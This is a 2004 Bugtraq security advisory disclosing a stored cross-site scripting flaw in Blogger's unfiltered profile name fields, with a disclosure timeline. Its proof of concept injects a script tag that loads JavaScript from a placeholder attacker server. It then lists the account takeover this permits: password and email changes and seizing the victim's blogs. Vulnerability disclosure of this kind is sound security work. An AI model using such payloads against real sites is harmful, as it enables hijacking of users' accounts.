[34261] in bugtraq
Blogger XSS Vulnerability
daemon@ATHENA.MIT.EDU (Ferruh Mavituna)
Fri Mar 26 16:47:49 2004
Message-ID: <20040326210538.10313.qmail@mail.securityfocus.com>
From: "Ferruh Mavituna" <ferruh@mavituna.com>
To: <bugtraq@securityfocus.com>
Date: Fri, 26 Mar 2004 23:07:18 +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-9"
Content-Transfer-Encoding: 7bit
------------------------------------------------------
BLOGGER XSS VULNERABILITY
------------------------------------------------------
Online URL : http://ferruh.mavituna.com/article/?470
Severity : Moderately Critical for Members (Permanent User Account
Hijacking)
------------------------------------------------------
ABOUT BLOGGER;
------------------------------------------------------
Blogger is a web-based tool that helps you publish to the web instantly --
whenever the urge strikes. Blogger is the leading tool in the rapidly
growing area of web publishing known as weblogs, or "blogs."
by Google (Pyra Labs acquired by Google)
------------------------------------------------------
XSS DETAILS;
------------------------------------------------------
There is no HTML filter when rendering user profiles. So anyone can inject a
script into a profile's "First Name" "Last Name" etc.
If you inject a code into "First Name" this will be print and run in users's
first page [www.blogger.com], so an attacker can easily gain victim's
account.
------------------------------------------------------
Proof Of Concept;
------------------------------------------------------
Inject [script src="http://[ATTACKER-SERVER]/EVIL-JS/"][/script] to
victim "First Name"
Now you can execute anything in remote.
After login as your victim;
I. You can change password (without old password)
II. You can change e-mail address without any confirmation
III. You can own the victim blogs
*Replace ][,<>
*Script injection is limited to 50 characters (but it's pretty
enough to add js script)
-----------------------------------------------------
HISTORY;
------------------------------------------------------
Discovered : 2/22/2004
Vendor Informed : 2/25/2004
Published : 3/26/2004
------------------------------------------------------
VENDOR STATUS;
------------------------------------------------------
Contact established with Google but there is no answer.
Ferruh Mavituna
Web Application Security Specialist
http://ferruh.mavituna.com
ferruh@mavituna.com
PGPKey : http://ferruh.mavituna.com/PGPKey.asc
